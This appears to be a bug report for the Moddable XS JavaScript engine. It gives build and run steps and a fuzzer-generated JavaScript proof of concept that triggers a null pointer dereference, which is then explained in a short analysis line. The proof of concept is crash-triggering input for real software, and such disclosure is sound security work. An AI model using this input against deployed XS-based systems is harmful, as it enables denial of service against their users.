null pointer dereference #379
Description
Enviroment
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
poc:
function safeEscape(v) {
return Array.prototype.map.call(v, function (v) {
if (v.charCodeAt(0) < 32 || v.charCodeAt(0) > 127 || v === '|O@aud' || v === 'v|4QJ#!tYbmHIS') {
return 'TP4C4Q^5n)|&TPEW&J_sy*9' + v.charCodeAt(0) + 'N39Mrsg';
}
return v;
}).join('`pv,');
}
function stringLiteralTest() {
[
'Ma',
'<c',
'WF{SXPgj)W72`U',
'Hr*G7;kSodn|vZt8JH',
'',
'_#7whg9RxV$Y7$RY[Aw',
'u6Rm&NkZOa|$|qwoa+M',
'X*;H9|jR~EXt(X>j-',
']{*(=}XM8^TE&c+',
'W?`pp]=cR0?y&-SbfB+',
'Em%{azew3z[$+uCwX~',
'f?I<9NCA',
'xpA5pwI*W%',
'(fOy6l2&+!W',
'1W^;g6SYH^A5',
'uj',
'Xgkv3GAIvs!D#Z,6~1',
'T1]b!skn`Vn3NGd>',
'[DAlz)C@ro0&06|[0Gh',
'~rWK%ewydHbW?',
'|D,U_%3r;Pwd#JL',
'Yf-S51M>(if}eAM',
'DTB5fhqkB/H0Km!Dt0jLPSa',
'Xz7-}8G-lFU$#SvL',
'tCoe+[Vxa1AXx',
'IJfL%@m/',
'*8O`N2HyOyjFM^1LNeGPT',
'Pe_D[hm0K94rLIQ8)2x',
'Cjx5FRs##)(=Z',
'9pSa(G4e;8%nqdZRZ2dnThB3',
'mv9{&*DSXp',
'^,{nl$L;2c8&p,2Ya',
'fEm)HN(}XJ^sjs*IBO5>-',
'U3',
'b%YRFYG;!q',
'xJz>3_p`9[rv9J2&&1[P#N25',
'Jq/ujUG8$qc+g#',
'',
'H7yUDDI>=K]up[d<B',
']',
'Z5zj6&Tar',
'o2q#pmH.Ko*J_1j>R9q45',
'`BhV',
'p}ATCMxS|,|$Yp5f',
'4-',
'p2^WNmR^T?_!pUW',
'?M?',
'oSa9;',
'6j&da-0v',
',,OU/K67=u',
'hpb2T7LHV~c.U2gstS-K/bS',
'J`G9HjdX*<)2b??]1_h].4',
'yq3oPgO=W<rG#'
].forEach(function (v) {
var src = '[p9G' + v + '2<kxWr+DZ}q`5W_^|I6Y,^+n';
var res;
try {
res.attrs = eval(src);
var Yfme = Proxy;
JSON.parse('DCmsg8#gQh[*u');
var Xprd = new ArrayBuffer(null);
} catch (e) {
}
});
JSON.stringify('o;ruw~w<q`GX<&g7n*6>s');
var zRjS = escape('fQrxjM4^U^7nz');
zRjS.length = stringLiteralTest();
}
try {
stringLiteralTest();
} catch (e) {
}
function plainEscapeTest() {
var A = 100;
var mpYY = Promise;
var Brjr = safeEscape(A);
var fyxT = safeEscape(null);
var wstW = Symbol;
var cWYf = plainEscapeTest();
var dXiE = Symbol;
var zxAP = JSON.stringify('nSE3wBW,>+se#I)9KuURm!');
var SwMK = JSON.stringify('');
var QjrQ = plainEscapeTest();
var O = {
o: 123,
A: 'W4)2'
};
(function () {
}.name['_}'] = 'b#MEG_n>_cw,2~');
var seph = stringLiteralTest();
var TNFC = Promise;
[
'*m[$okd9{&)hN&2dl&F/DT',
'NSuexaoL.^1mIw?E{G-&Q',
'C{',
'+kAc66?Te5{eNO3',
'r{pR7V',
'Th+{|Wd)I$PLxu3lc5[(RoWp',
'|{1$ML62kcT{a31A=>Q>a]',
'L5)Wl?h[i}yc^>`x',
'cXn--r<Mw0rI1Nzu!',
'}|qfo?{h$Tb_u7#Ur<04|)]',
'Zw2t*RmhWZj'
].forEach(function (v) {
var src = v;
var NQcb = Symbol;
var yBbb = new SharedArrayBuffer(null);
var AdwZ = DataView;
var fTQj = Math;
var ctxG = plainEscapeTest();
var Grma = stringLiteralTest();
var daDw = new RegExp('Btj');
O.A = src.toLocaleUpperCase();
var rmRB = new ArrayBuffer(null);
var res;
var WAJw = null < null;
var dYwh = Symbol;
try {
(function () {
}.name = String(eval(src)));
var ppRY = new BigUint64Array([
function () {
}.hasInstance,
function () {
}.isConcatSpreadable,
null,
function () {
},
null,
function () {
}.toPrimitive,
function () {
}.search
]);
} catch (e) {
}
});
}
try {
plainEscapeTest();
var TtZN = safeEscape(null);
} catch (e) {
}
vulnerability analysis
We can see that the program tries to access the memory area pointed to by rax+0x2, but the value of rax is 0
